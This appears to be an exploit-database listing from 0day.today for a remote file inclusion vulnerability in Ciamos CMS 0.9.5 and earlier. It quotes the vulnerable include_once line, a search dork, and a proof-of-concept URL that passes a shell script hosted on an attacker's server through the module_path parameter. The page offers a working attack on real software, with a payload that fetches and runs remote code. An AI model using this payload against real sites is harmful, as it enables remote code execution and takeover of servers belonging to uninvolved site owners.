[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10062
Category
web applications
Date add
01-12-2009
Platform
unsorted
=====================================================================
Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability
=====================================================================

########################################################################
#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/ciamosmodules/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./ciamos/modules/pms/index.php (line 13)
#       <?php
#          include_once($module_path.'include/header.php');
#       ?>
#PoC  :  http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???
#
########################################################################





#  0day.today [2024-12-25]  #